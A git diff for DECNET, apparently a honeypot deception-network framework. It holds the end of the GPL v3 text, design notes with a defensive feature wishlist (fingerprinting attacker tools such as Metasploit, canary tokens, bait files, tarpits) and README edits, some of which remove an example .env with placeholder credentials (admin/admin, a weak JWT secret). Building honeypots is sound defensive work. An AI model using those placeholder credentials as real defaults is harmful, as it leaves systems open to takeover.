If you convey an object code work under this section in, or with, or
|
||||
specifically for use in, a User Product, and the conveying occurs as
|
||||
part of a transaction in which the right of possession and use of the
|
||||
User Product is transferred to the recipient in perpetuity or for a
|
||||
fixed term (regardless of how the transaction is characterized), the
|
||||
Corresponding Source conveyed under this section must be accompanied
|
||||
by the Installation Information. But this requirement does not apply
|
||||
if neither you nor any third party retains the ability to install
|
||||
modified object code on the User Product (for example, the work has
|
||||
been installed in ROM).
|
||||
|
||||
The requirement to provide Installation Information does not include a
|
||||
requirement to continue to provide support service, warranty, or updates
|
||||
for a work that has been modified or installed by the recipient, or for
|
||||
the User Product in which it has been modified or installed. Access to a
|
||||
network may be denied when the modification itself materially and
|
||||
adversely affects the operation of the network or violates the rules and
|
||||
protocols for communication across the network.
|
||||
|
||||
Corresponding Source conveyed, and Installation Information provided,
|
||||
in accord with this section must be in a format that is publicly
|
||||
documented (and with an implementation available to the public in
|
||||
source code form), and must require no special password or key for
|
||||
unpacking, reading or copying.
|
||||
|
||||
7. Additional Terms.
|
||||
|
||||
"Additional permissions" are terms that supplement the terms of this
|
||||
License by making exceptions from one or more of its conditions.
|
||||
Additional permissions that are applicable to the entire Program shall
|
||||
be treated as though they were included in this License, to the extent
|
||||
that they are valid under applicable law. If additional permissions
|
||||
apply only to part of the Program, that part may be used separately
|
||||
under those permissions, but the entire Program remains governed by
|
||||
this License without regard to the additional permissions.
|
||||
|
||||
When you convey a copy of a covered work, you may at your option
|
||||
remove any additional permissions from that copy, or from any part of
|
||||
it. (Additional permissions may be written to require their own
|
||||
removal in certain cases when you modify the work.) You may place
|
||||
additional permissions on material, added by you to a covered work,
|
||||
for which you have or can give appropriate copyright permission.
|
||||
|
||||
Notwithstanding any other provision of this License, for material you
|
||||
add to a covered work, you may (if authorized by the copyright holders of
|
||||
that material) supplement the terms of this License with terms:
|
||||
|
||||
a) Disclaiming warranty or limiting liability differently from the
|
||||
terms of sections 15 and 16 of this License; or
|
||||
|
||||
b) Requiring preservation of specified reasonable legal notices or
|
||||
author attributions in that material or in the Appropriate Legal
|
||||
Notices displayed by works containing it; or
|
||||
|
||||
c) Prohibiting misrepresentation of the origin of that material, or
|
||||
requiring that modified versions of such material be marked in
|
||||
reasonable ways as different from the original version; or
|
||||
|
||||
d) Limiting the use for publicity purposes of names of licensors or
|
||||
authors of the material; or
|
||||
|
||||
e) Declining to grant rights under trademark law for use of some
|
||||
trade names, trademarks, or service marks; or
|
||||
|
||||
f) Requiring indemnification of licensors and authors of that
|
||||
material by anyone who conveys the material (or modified versions of
|
||||
it) with contractual assumptions of liability to the recipient, for
|
||||
any liability that these contractual assumptions directly impose on
|
||||
those licensors and authors.
|
||||
|
||||
All other non-permissive additional terms are considered "further
|
||||
restrictions" within the meaning of section 10. If the Program as you
|
||||
received it, or any part of it, contains a notice stating that it is
|
||||
governed by this License along with a term that is a further
|
||||
restriction, you may remove that term. If a license document contains
|
||||
a further restriction but permits relicensing or conveying under this
|
||||
License, you may add to a covered work material governed by the terms
|
||||
of that license document, provided that the further restriction does
|
||||
not survive such relicensing or conveying.
|
||||
|
||||
If you add terms to a covered work in accord with this section, you
|
||||
must place, in the relevant source files, a statement of the
|
||||
additional terms that apply to those files, or a notice indicating
|
||||
where to find the applicable terms.
|
||||
|
||||
Additional terms, permissive or non-permissive, may be stated in the
|
||||
form of a separately written license, or stated as exceptions;
|
||||
the above requirements apply either way.
|
||||
|
||||
8. Termination.
|
||||
|
||||
You may not propagate or modify a covered work except as expressly
|
||||
provided under this License. Any attempt otherwise to propagate or
|
||||
modify it is void, and will automatically terminate your rights under
|
||||
this License (including any patent licenses granted under the third
|
||||
paragraph of section 11).
|
||||
|
||||
However, if you cease all violation of this License, then your
|
||||
license from a particular copyright holder is reinstated (a)
|
||||
provisionally, unless and until the copyright holder explicitly and
|
||||
finally terminates your license, and (b) permanently, if the copyright
|
||||
holder fails to notify you of the violation by some reasonable means
|
||||
prior to 60 days after the cessation.
|
||||
|
||||
Moreover, your license from a particular copyright holder is
|
||||
reinstated permanently if the copyright holder notifies you of the
|
||||
violation by some reasonable means, this is the first time you have
|
||||
received notice of violation of this License (for any work) from that
|
||||
copyright holder, and you cure the violation prior to 30 days after
|
||||
your receipt of the notice.
|
||||
|
||||
Termination of your rights under this section does not terminate the
|
||||
licenses of parties who have received copies or rights from you under
|
||||
this License. If your rights have been terminated and not permanently
|
||||
reinstated, you do not qualify to receive new licenses for the same
|
||||
material under section 10.
|
||||
|
||||
9. Acceptance Not Required for Having Copies.
|
||||
|
||||
You are not required to accept this License in order to receive or
|
||||
run a copy of the Program. Ancillary propagation of a covered work
|
||||
occurring solely as a consequence of using peer-to-peer transmission
|
||||
to receive a copy likewise does not require acceptance. However,
|
||||
nothing other than this License grants you permission to propagate or
|
||||
modify any covered work. These actions infringe copyright if you do
|
||||
not accept this License. Therefore, by modifying or propagating a
|
||||
covered work, you indicate your acceptance of this License to do so.
|
||||
|
||||
10. Automatic Licensing of Downstream Recipients.
|
||||
|
||||
Each time you convey a covered work, the recipient automatically
|
||||
receives a license from the original licensors, to run, modify and
|
||||
propagate that work, subject to this License. You are not responsible
|
||||
for enforcing compliance by third parties with this License.
|
||||
|
||||
An "entity transaction" is a transaction transferring control of an
|
||||
organization, or substantially all assets of one, or subdividing an
|
||||
organization, or merging organizations. If propagation of a covered
|
||||
work results from an entity transaction, each party to that
|
||||
transaction who receives a copy of the work also receives whatever
|
||||
licenses to the work the party's predecessor in interest had or could
|
||||
give under the previous paragraph, plus a right to possession of the
|
||||
Corresponding Source of the work from the predecessor in interest, if
|
||||
the predecessor has it or can get it with reasonable efforts.
|
||||
|
||||
You may not impose any further restrictions on the exercise of the
|
||||
rights granted or affirmed under this License. For example, you may
|
||||
not impose a license fee, royalty, or other charge for exercise of
|
||||
rights granted under this License, and you may not initiate litigation
|
||||
(including a cross-claim or counterclaim in a lawsuit) alleging that
|
||||
any patent claim is infringed by making, using, selling, offering for
|
||||
sale, or importing the Program or any portion of it.
|
||||
|
||||
11. Patents.
|
||||
|
||||
A "contributor" is a copyright holder who authorizes use under this
|
||||
License of the Program or a work on which the Program is based. The
|
||||
work thus licensed is called the contributor's "contributor version".
|
||||
|
||||
A contributor's "essential patent claims" are all patent claims
|
||||
owned or controlled by the contributor, whether already acquired or
|
||||
hereafter acquired, that would be infringed by some manner, permitted
|
||||
by this License, of making, using, or selling its contributor version,
|
||||
but do not include claims that would be infringed only as a
|
||||
consequence of further modification of the contributor version. For
|
||||
purposes of this definition, "control" includes the right to grant
|
||||
patent sublicenses in a manner consistent with the requirements of
|
||||
this License.
|
||||
|
||||
Each contributor grants you a non-exclusive, worldwide, royalty-free
|
||||
patent license under the contributor's essential patent claims, to
|
||||
make, use, sell, offer for sale, import and otherwise run, modify and
|
||||
propagate the contents of its contributor version.
|
||||
|
||||
In the following three paragraphs, a "patent license" is any express
|
||||
agreement or commitment, however denominated, not to enforce a patent
|
||||
(such as an express permission to practice a patent or covenant not to
|
||||
sue for patent infringement). To "grant" such a patent license to a
|
||||
party means to make such an agreement or commitment not to enforce a
|
||||
patent against the party.
|
||||
|
||||
If you convey a covered work, knowingly relying on a patent license,
|
||||
and the Corresponding Source of the work is not available for anyone
|
||||
to copy, free of charge and under the terms of this License, through a
|
||||
publicly available network server or other readily accessible means,
|
||||
then you must either (1) cause the Corresponding Source to be so
|
||||
available, or (2) arrange to deprive yourself of the benefit of the
|
||||
patent license for this particular work, or (3) arrange, in a manner
|
||||
consistent with the requirements of this License, to extend the patent
|
||||
license to downstream recipients. "Knowingly relying" means you have
|
||||
actual knowledge that, but for the patent license, your conveying the
|
||||
covered work in a country, or your recipient's use of the covered work
|
||||
in a country, would infringe one or more identifiable patents in that
|
||||
country that you have reason to believe are valid.
|
||||
|
||||
If, pursuant to or in connection with a single transaction or
|
||||
arrangement, you convey, or propagate by procuring conveyance of, a
|
||||
covered work, and grant a patent license to some of the parties
|
||||
receiving the covered work authorizing them to use, propagate, modify
|
||||
or convey a specific copy of the covered work, then the patent license
|
||||
you grant is automatically extended to all recipients of the covered
|
||||
work and works based on it.
|
||||
|
||||
A patent license is "discriminatory" if it does not include within
|
||||
the scope of its coverage, prohibits the exercise of, or is
|
||||
conditioned on the non-exercise of one or more of the rights that are
|
||||
specifically granted under this License. You may not convey a covered
|
||||
work if you are a party to an arrangement with a third party that is
|
||||
in the business of distributing software, under which you make payment
|
||||
to the third party based on the extent of your activity of conveying
|
||||
the work, and under which the third party grants, to any of the
|
||||
parties who would receive the covered work from you, a discriminatory
|
||||
patent license (a) in connection with copies of the covered work
|
||||
conveyed by you (or copies made from those copies), or (b) primarily
|
||||
for and in connection with specific products or compilations that
|
||||
contain the covered work, unless you entered into that arrangement,
|
||||
or that patent license was granted, prior to 28 March 2007.
|
||||
|
||||
Nothing in this License shall be construed as excluding or limiting
|
||||
any implied license or other defenses to infringement that may
|
||||
otherwise be available to you under applicable patent law.
|
||||
|
||||
12. No Surrender of Others' Freedom.
|
||||
|
||||
If conditions are imposed on you (whether by court order, agreement or
|
||||
otherwise) that contradict the conditions of this License, they do not
|
||||
excuse you from the conditions of this License. If you cannot convey a
|
||||
covered work so as to satisfy simultaneously your obligations under this
|
||||
License and any other pertinent obligations, then as a consequence you may
|
||||
not convey it at all. For example, if you agree to terms that obligate you
|
||||
to collect a royalty for further conveying from those to whom you convey
|
||||
the Program, the only way you could satisfy both those terms and this
|
||||
License would be to refrain entirely from conveying the Program.
|
||||
|
||||
13. Use with the GNU Affero General Public License.
|
||||
|
||||
Notwithstanding any other provision of this License, you have
|
||||
permission to link or combine any covered work with a work licensed
|
||||
under version 3 of the GNU Affero General Public License into a single
|
||||
combined work, and to convey the resulting work. The terms of this
|
||||
License will continue to apply to the part which is the covered work,
|
||||
but the special requirements of the GNU Affero General Public License,
|
||||
section 13, concerning interaction through a network will apply to the
|
||||
combination as such.
|
||||
|
||||
14. Revised Versions of this License.
|
||||
|
||||
The Free Software Foundation may publish revised and/or new versions of
|
||||
the GNU General Public License from time to time. Such new versions will
|
||||
be similar in spirit to the present version, but may differ in detail to
|
||||
address new problems or concerns.
|
||||
|
||||
Each version is given a distinguishing version number. If the
|
||||
Program specifies that a certain numbered version of the GNU General
|
||||
Public License "or any later version" applies to it, you have the
|
||||
option of following the terms and conditions either of that numbered
|
||||
version or of any later version published by the Free Software
|
||||
Foundation. If the Program does not specify a version number of the
|
||||
GNU General Public License, you may choose any version ever published
|
||||
by the Free Software Foundation.
|
||||
|
||||
If the Program specifies that a proxy can decide which future
|
||||
versions of the GNU General Public License can be used, that proxy's
|
||||
public statement of acceptance of a version permanently authorizes you
|
||||
to choose that version for the Program.
|
||||
|
||||
Later license versions may give you additional or different
|
||||
permissions. However, no additional obligations are imposed on any
|
||||
author or copyright holder as a result of your choosing to follow a
|
||||
later version.
|
||||
|
||||
15. Disclaimer of Warranty.
|
||||
|
||||
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
|
||||
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
|
||||
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
|
||||
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
|
||||
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
|
||||
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
|
||||
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
|
||||
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
|
||||
|
||||
16. Limitation of Liability.
|
||||
|
||||
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
|
||||
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
|
||||
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
|
||||
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
|
||||
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
|
||||
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
|
||||
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
|
||||
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
|
||||
SUCH DAMAGES.
|
||||
|
||||
17. Interpretation of Sections 15 and 16.
|
||||
|
||||
If the disclaimer of warranty and limitation of liability provided
|
||||
above cannot be given local legal effect according to their terms,
|
||||
reviewing courts shall apply local law that most closely approximates
|
||||
an absolute waiver of all civil liability in connection with the
|
||||
Program, unless a warranty or assumption of liability accompanies a
|
||||
copy of the Program in return for a fee.
|
||||
|
||||
END OF TERMS AND CONDITIONS
|
||||
|
||||
How to Apply These Terms to Your New Programs
|
||||
|
||||
If you develop a new program, and you want it to be of the greatest
|
||||
possible use to the public, the best way to achieve this is to make it
|
||||
free software which everyone can redistribute and change under these terms.
|
||||
|
||||
To do so, attach the following notices to the program. It is safest
|
||||
to attach them to the start of each source file to most effectively
|
||||
state the exclusion of warranty; and each file should have at least
|
||||
the "copyright" line and a pointer to where the full notice is found.
|
||||
|
||||
<one line to give the program's name and a brief idea of what it does.>
|
||||
Copyright (C) <year> <name of author>
|
||||
|
||||
This program is free software: you can redistribute it and/or modify
|
||||
it under the terms of the GNU General Public License as published by
|
||||
the Free Software Foundation, either version 3 of the License, or
|
||||
(at your option) any later version.
|
||||
|
||||
This program is distributed in the hope that it will be useful,
|
||||
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
GNU General Public License for more details.
|
||||
|
||||
You should have received a copy of the GNU General Public License
|
||||
along with this program. If not, see <https://www.gnu.org/licenses/>.
|
||||
|
||||
Also add information on how to contact you by electronic and paper mail.
|
||||
|
||||
If the program does terminal interaction, make it output a short
|
||||
notice like this when it starts in an interactive mode:
|
||||
|
||||
<program> Copyright (C) <year> <name of author>
|
||||
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
|
||||
This is free software, and you are welcome to redistribute it
|
||||
under certain conditions; type `show c' for details.
|
||||
|
||||
The hypothetical commands `show w' and `show c' should show the appropriate
|
||||
parts of the General Public License. Of course, your program's commands
|
||||
might be different; for a GUI interface, you would use an "about box".
|
||||
|
||||
You should also get your employer (if you work as a programmer) or school,
|
||||
if any, to sign a "copyright disclaimer" for the program, if necessary.
|
||||
For more information on this, and how to apply and follow the GNU GPL, see
|
||||
<https://www.gnu.org/licenses/>.
|
||||
|
||||
The GNU General Public License does not permit incorporating your program
|
||||
into proprietary programs. If your program is a subroutine library, you
|
||||
may consider it more useful to permit linking proprietary applications with
|
||||
the library. If this is what you want to do, use the GNU Lesser General
|
||||
Public License instead of this License. But first, please read
|
||||
<https://www.gnu.org/licenses/why-not-lgpl.html>.
|
||||
113
NOTES.md
Normal file
113
NOTES.md
Normal file
@@ -0,0 +1,113 @@
|
||||
# Initial steps
|
||||
|
||||
# Architecture
|
||||
|
||||
## DECNET-UNIHOST model
|
||||
|
||||
The unihost model is a mode in which DECNET deploys an _n_ amount of machines from a single one. This execution model lives in a decoy network which is accessible to an attacker from the outside.
|
||||
|
||||
Each decky (the son of the DECNET unihost) should have different services (RDP, SMB, SSH, FTP, etc) and all of them should communicate with an external, isolated network, which aggregates data and allows
|
||||
visualizations to be made. Think of the ELK stack. That data is then passed back via Logstash or other methods to a SIEM device or something else that may benefit from this collected data.
|
||||
|
||||
## DECNET-MULTIHOST (SWARM) model
|
||||
|
||||
The SWARM model is similar to the UNIHOST model, but the difference is that instead of one real machine, we have n>1 machines. Same thought process really, but deployment may be different.
|
||||
A low-cost and fairly automatable option is to use Ansible, sshpass, or other tools.
|
||||
|
||||
# Modus operandi
|
||||
|
||||
## Docker-Compose
|
||||
|
||||
I will use Docker Compose extensively for this project. The reasons are:
|
||||
- Easily managed.
|
||||
- Easily extensible.
|
||||
- Less overhead.
|
||||
|
||||
To be completely transparent: I asked Deepseek to write the initial `docker-compose.yml` file. It was mostly boilerplate, and most of it was later modified or deleted. It doesn't exist anymore.
|
||||
|
||||
## Distro to use.
|
||||
|
||||
I will be using the `debian:bookworm-slim` image for all the containers. I might think about mixing in some Ubuntu or CentOS, but for now, Debian will do just fine.
|
||||
|
||||
The distro I'm running is WSL Kali Linux. Let's hope this doesn't cause any problems down the road.
|
||||
|
||||
## Networking
|
||||
|
||||
It was a hassle, but I think MACVLAN or IPVLAN (thanks @Deepseek!) might work. The reasoning behind picking this networking driver is that for the project to work, each container must be fully accessible from the network. This is to attempt to masquerade them as real, live machines.
|
||||
|
||||
Now, we will need a publicly accessible, real server that has access to this "internal" network. I'll try MACVLAN first.
|
||||
|
||||
### MACVLAN Tests
|
||||
|
||||
I will first use the default network to see what happens.
|
||||
|
||||
```
|
||||
docker network create -d macvlan \
|
||||
--subnet=192.168.1.0/24 \
|
||||
--gateway=192.168.1.1 \
|
||||
-o parent=eth0 localnet
|
||||
```
|
||||
|
||||
#### Issues
|
||||
|
||||
This initial test doesn't seem to be working. Might be that I'm using WSL, so I downloaded an Ubuntu 22.04 Server ISO. I'll try the MACVLAN network on it. Now, if that doesn't work, I don't see how the 802.1q would work, at least on _my network_. Perhaps if I had a switch I could make it work, but currently I don't have one :c
|
||||
|
||||
---
|
||||
|
||||
# TODO
|
||||
|
||||
## Core / Hardening
|
||||
|
||||
- [ ] **Attacker fingerprinting** — Beyond IP logging: capture TLS JA3/JA4 hashes, TCP window sizes, User-Agent strings, SSH client banners, and tool signatures (nmap, masscan, Metasploit, Cobalt Strike). Build attacker profiles across sessions.
|
||||
- [ ] **Canary tokens** — Embed canary URLs, fake AWS keys, fake API tokens, and honeydocs (PDF/DOCX with phone-home URLs) into decky filesystems. Fire an alert the moment one is used.
|
||||
- [ ] **Tarpit mode** — Slow down attackers by making services respond extremely slowly (e.g., SSH that takes 60s to reject, HTTP that drip-feeds bytes). Wastes attacker time and resources.
|
||||
- [ ] **Dynamic decky mutation** — Deckies that change their exposed services or OS fingerprint over time to confuse port-scan caching and appear more "alive."
|
||||
- [ ] **Credential harvesting DB** — Every username/password attempt across all services lands in a queryable database. Expose via CLI (`decnet creds`) and flag reuse across deckies.
|
||||
- [ ] **Session recording** — Full session capture for SSH/Telnet (keystroke logs, commands run, files downloaded). Cowrie already does this — surface it better in the CLI and correlation engine.
|
||||
- [ ] **Payload capture** — Store every file uploaded or command executed by an attacker. Hash and auto-submit to VirusTotal or a local sandbox.
|
||||
|
||||
## Detection & Intelligence
|
||||
|
||||
- [ ] **Real-time alerting** — Webhook/Slack/Telegram notifications when an attacker hits a decky for the first time, crosses N deckies (lateral movement), or uses a known bad IP.
|
||||
- [ ] **Threat intel enrichment** — Auto-lookup attacker IPs against AbuseIPDB, Shodan, GreyNoise, and AlienVault OTX. Tag known scanners vs. targeted attackers.
|
||||
- [ ] **Attack campaign clustering** — Group attacker sessions by tooling signatures, timing patterns, and credential sets. Identify coordinated campaigns hitting multiple deckies.
|
||||
- [ ] **GeoIP mapping** — Attacker origin on a world map. Correlate with ASN data to identify cloud exit nodes, VPNs, and Tor exits.
|
||||
- [ ] **TTPs tagging** — Map observed attacker behaviors to MITRE ATT&CK techniques automatically. Tag events in the correlation engine.
|
||||
- [ ] **Honeypot interaction scoring** — Score attackers on a scale: casual scanner vs. persistent targeted attacker, based on depth of interaction and commands run.
|
||||
|
||||
## Dashboard & Visibility
|
||||
|
||||
- [ ] **Web dashboard** — Real-time web UI showing live decky status, attacker activity, traversal graphs, and credential stats. Could be a simple FastAPI + HTMX or a full React app.
|
||||
- [ ] **Pre-built Kibana/Grafana dashboards** — Ship dashboard JSON exports out of the box so ELK/Grafana deployments are plug-and-play.
|
||||
- [ ] **CLI live feed** — `decnet watch` command: tail all decky logs in a unified, colored terminal stream (like `docker-compose logs -f` but prettier).
|
||||
- [ ] **Traversal graph export** — Export attacker traversal graphs as DOT/Graphviz or JSON for visualization in external tools.
|
||||
- [ ] **Daily digest** — Automated daily summary email/report: new attackers, top credentials tried, most-hit services.
|
||||
|
||||
## Deployment & Infrastructure
|
||||
|
||||
- [ ] **SWARM / multihost mode** — Full Ansible-based orchestration for deploying deckies across N real hosts.
|
||||
- [ ] **Terraform/Pulumi provider** — Spin up cloud-hosted deckies on AWS/GCP/Azure with one command. Useful for internet-facing honeynets.
|
||||
- [ ] **Auto-scaling** — When attack traffic increases, automatically spawn more deckies to absorb and log more activity.
|
||||
- [ ] **Kubernetes deployment mode** — Run deckies as Kubernetes pods for environments already running k8s.
|
||||
- [ ] **Proxmox/libvirt backend** — Full VM-based deckies instead of containers, for even more realistic OS fingerprints and behavior. Docker for speed; VMs for realism.
|
||||
- [ ] **Raspberry Pi / ARM support** — Low-cost physical honeynets using RPis. Validate ARM image builds.
|
||||
- [ ] **Decky health monitoring** — Watchdog that auto-restarts crashed deckies and alerts if a service goes dark.
|
||||
|
||||
## Services & Realism
|
||||
|
||||
- [ ] **HTTPS/TLS support** — HTTP honeypot with a self-signed or Let's Encrypt cert. Many real-world services use HTTPS; plain HTTP stands out.
|
||||
- [ ] **Fake Active Directory** — A convincing fake AD/LDAP with fake users, groups, and GPOs. Attacker tools like BloodHound should get juicy (fake) data.
|
||||
- [ ] **Fake file shares** — SMB/NFS shares pre-populated with enticing but fake files: "passwords.xlsx", "vpn_config.ovpn", "backup_keys.tar.gz". All instrumented to detect access.
|
||||
- [ ] **Realistic web apps** — HTTP honeypot serving convincing fake apps: a fake WordPress, a fake phpMyAdmin, a fake Grafana login — all logging every interaction.
|
||||
- [ ] **OT/ICS profiles** — Expand Conpot support: Modbus, DNP3, BACnet, EtherNet/IP. Convincing industrial control system decoys.
|
||||
- [ ] **Printer/IoT archetypes** — Expand existing printer/camera archetypes with actual service emulation (IPP, ONVIF, WS-Discovery).
|
||||
- [ ] **Service interaction depth** — Some services currently just log the connection. Deepen interaction: fake MySQL that accepts queries and returns realistic fake data, fake Redis that stores and retrieves dummy keys.
|
||||
|
||||
## Developer Experience
|
||||
|
||||
- [ ] **Plugin SDK docs** — Full documentation and an example plugin for adding custom services. Lower the barrier for community contributions.
|
||||
- [ ] **Integration tests** — Full deploy/teardown cycle tests against a real Docker daemon (not just unit tests).
|
||||
- [ ] **Per-service tests** — Each of the 29 service implementations deserves its own test coverage.
|
||||
- [ ] **CI/CD pipeline** — GitHub/Gitea Actions: run tests on push, lint, build Docker images, publish releases.
|
||||
- [ ] **Config validation CLI** — `decnet validate my.ini` to dry-check an INI config before deploying.
|
||||
- [ ] **Config generator wizard** — `decnet wizard` interactive prompt to generate an INI config without writing one by hand.
|
||||
166
README.md
166
README.md
@@ -4,8 +4,6 @@ A honeypot deception network framework. Spin up a fleet of fake machines — cal
|
||||
|
||||
Attackers probe the network, DECNET traps every interaction, and you watch from a safe, isolated logging stack.
|
||||
|
||||
[](https://ko-fi.com/C0C31YDLB5)
|
||||
|
||||
---
|
||||
|
||||
## Table of Contents
|
||||
@@ -71,7 +69,7 @@ From the outside a decky looks identical to a real machine: it has its own MAC a
|
||||
## Installation
|
||||
|
||||
```bash
|
||||
git clone https://git.resacachile.cl/anti/DECNET
|
||||
git clone <repo-url> DECNET
|
||||
cd DECNET
|
||||
pip install -e .
|
||||
```
|
||||
@@ -209,26 +207,6 @@ sudo decnet deploy --deckies 4 --archetype windows-workstation
|
||||
[corp-workstations]
|
||||
archetype = windows-workstation
|
||||
amount = 4
|
||||
|
||||
[win-fileserver]
|
||||
services = ftp
|
||||
nmap_os = windows
|
||||
os_version = Windows Server 2019
|
||||
|
||||
[dbsrv01]
|
||||
ip = 192.168.1.112
|
||||
services = mysql, http
|
||||
nmap_os = linux
|
||||
|
||||
[dbsrv01.http]
|
||||
server_header = Apache/2.4.54 (Debian)
|
||||
response_code = 200
|
||||
fake_app = wordpress
|
||||
|
||||
[dbsrv01.mysql]
|
||||
mysql_version = 5.7.38-log
|
||||
mysql_banner = MySQL Community Server
|
||||
|
||||
```
|
||||
|
||||
---
|
||||
@@ -476,7 +454,7 @@ Key/value pairs are passed directly to the service plugin as persona config. Com
|
||||
| `mongodb` | `mongo_version` |
|
||||
| `elasticsearch` | `es_version`, `cluster_name` |
|
||||
| `ldap` | `base_dn`, `domain` |
|
||||
| `snmp` | `snmp_community`, `sys_descr`, `snmp_archetype` (picks predefined sysDescr for `water_plant`, `hospital`, etc.) |
|
||||
| `snmp` | `snmp_community`, `sys_descr` |
|
||||
| `mqtt` | `mqtt_version` |
|
||||
| `sip` | `sip_server`, `sip_domain` |
|
||||
| `k8s` | `k8s_version` |
|
||||
@@ -492,34 +470,6 @@ See [`test-full.ini`](test-full.ini) — covers all 25 services across 10 role-t
|
||||
|
||||
---
|
||||
|
||||
## Environment Configuration (.env)
|
||||
|
||||
DECNET supports loading configuration from `.env.local` and `.env` files located in the project root. This is useful for securing secrets like the JWT key and configuring default ports without passing flags every time.
|
||||
|
||||
An example `.env.example` is provided:
|
||||
|
||||
```ini
|
||||
# API Options
|
||||
DECNET_API_HOST=0.0.0.0
|
||||
DECNET_API_PORT=8000
|
||||
DECNET_JWT_SECRET=supersecretkey12345
|
||||
DECNET_INGEST_LOG_FILE=/var/log/decnet/decnet.log
|
||||
|
||||
# Web Dashboard Options
|
||||
DECNET_WEB_HOST=0.0.0.0
|
||||
DECNET_WEB_PORT=8080
|
||||
DECNET_ADMIN_USER=admin
|
||||
DECNET_ADMIN_PASSWORD=admin
|
||||
|
||||
# Database pool tuning (applies to both SQLite and MySQL)
|
||||
DECNET_DB_POOL_SIZE=20 # base pool connections (default: 20)
|
||||
DECNET_DB_MAX_OVERFLOW=40 # extra connections under burst (default: 40)
|
||||
```
|
||||
|
||||
Copy `.env.example` to `.env.local` and modify it to suit your environment.
|
||||
|
||||
---
|
||||
|
||||
## Logging
|
||||
|
||||
All attacker interactions are forwarded off the decoy network to an isolated logging sink. The log pipeline lives on a separate internal Docker bridge (`decnet_logs`) that is not reachable from the fake LAN.
|
||||
@@ -681,115 +631,3 @@ The test suite covers:
|
||||
| `test_cli_service_pool.py` | CLI service resolution |
|
||||
|
||||
Every new feature requires passing tests before merging.
|
||||
|
||||
### Stress Testing
|
||||
|
||||
A [Locust](https://locust.io)-based stress test suite lives in `tests/stress/`. It hammers every API endpoint with realistic traffic patterns to find throughput ceilings and latency degradation.
|
||||
|
||||
```bash
|
||||
# Run via pytest (starts its own server)
|
||||
pytest -m stress tests/stress/ -v -x -n0 -s
|
||||
|
||||
# Crank it up
|
||||
STRESS_USERS=2000 STRESS_SPAWN_RATE=200 STRESS_DURATION=120 pytest -m stress tests/stress/ -v -x -n0 -s
|
||||
|
||||
# Standalone Locust web UI against a running server
|
||||
locust -f tests/stress/locustfile.py --host http://localhost:8000
|
||||
```
|
||||
|
||||
| Env var | Default | Description |
|
||||
|---|---|---|
|
||||
| `STRESS_USERS` | `500` | Total simulated users |
|
||||
| `STRESS_SPAWN_RATE` | `50` | Users spawned per second |
|
||||
| `STRESS_DURATION` | `60` | Test duration in seconds |
|
||||
| `STRESS_WORKERS` | CPU count (max 4) | Uvicorn workers for the test server |
|
||||
| `STRESS_MIN_RPS` | `500` | Minimum RPS to pass baseline test |
|
||||
| `STRESS_MAX_P99_MS` | `200` | Maximum p99 latency (ms) to pass |
|
||||
| `STRESS_SPIKE_USERS` | `1000` | Users for thundering herd test |
|
||||
| `STRESS_SUSTAINED_USERS` | `200` | Users for sustained load test |
|
||||
|
||||
#### Measured baseline
|
||||
|
||||
Reference numbers from recent Locust runs against a MySQL backend
|
||||
(asyncmy driver). All runs hold zero failures throughout.
|
||||
|
||||
**Single worker** (unless noted):
|
||||
|
||||
| Metric | 500u, tracing on | 1500u, tracing on | 1500u, tracing **off** | 1500u, tracing off, **pinned to 1 core** | 1500u, tracing off, **12 workers** |
|
||||
|---|---|---|---|---|---|
|
||||
| Requests served | 396,672 | 232,648 | 277,214 | 3,532 | 308,024 |
|
||||
| Failures | 0 | 0 | 0 | 0 | 0 |
|
||||
| Throughput (current RPS) | ~960 | ~880 | ~990 | ~46 | ~1,585 |
|
||||
| Average latency | 465 ms | 1,774 ms | 1,489 ms | 21.7 s | 930 ms |
|
||||
| Median (p50) | 100 ms | 690 ms | 340 ms | 270 ms | 700 ms |
|
||||
| p95 | 1.9 s | 6.5 s | 5.7 s | 115 s | 2.7 s |
|
||||
| p99 | 2.9 s | 9.5 s | 8.4 s | 122 s | 4.2 s |
|
||||
| Max observed | 8.3 s | 24.4 s | 20.9 s | 124.5 s | 16.5 s |
|
||||
|
||||
Ramp is 15 users/s for the 500u column, 40 users/s otherwise.
|
||||
|
||||
Takeaways:
|
||||
|
||||
- **Tracing off**: at 1500 users, flipping `DECNET_TRACING=false`
|
||||
halves p50 (690 → 340 ms) and pushes RPS from ~880 past the
|
||||
500-user figure on a single worker.
|
||||
- **12 workers**: RPS scales ~1.6× over a single worker (~990 →
|
||||
~1585). Sublinear because the workload is DB-bound — MySQL and the
|
||||
connection pool become the new ceiling, not Python. p99 drops from
|
||||
8.4 s to 4.2 s.
|
||||
- **Connection math**: (`DECNET_DB_POOL_SIZE=20` + `DECNET_DB_MAX_OVERFLOW=40`)
|
||||
× 12 workers = 720 connections at peak. MySQL's default
|
||||
`max_connections=151` needs bumping (we used 2000) before running
|
||||
multi-worker load.
|
||||
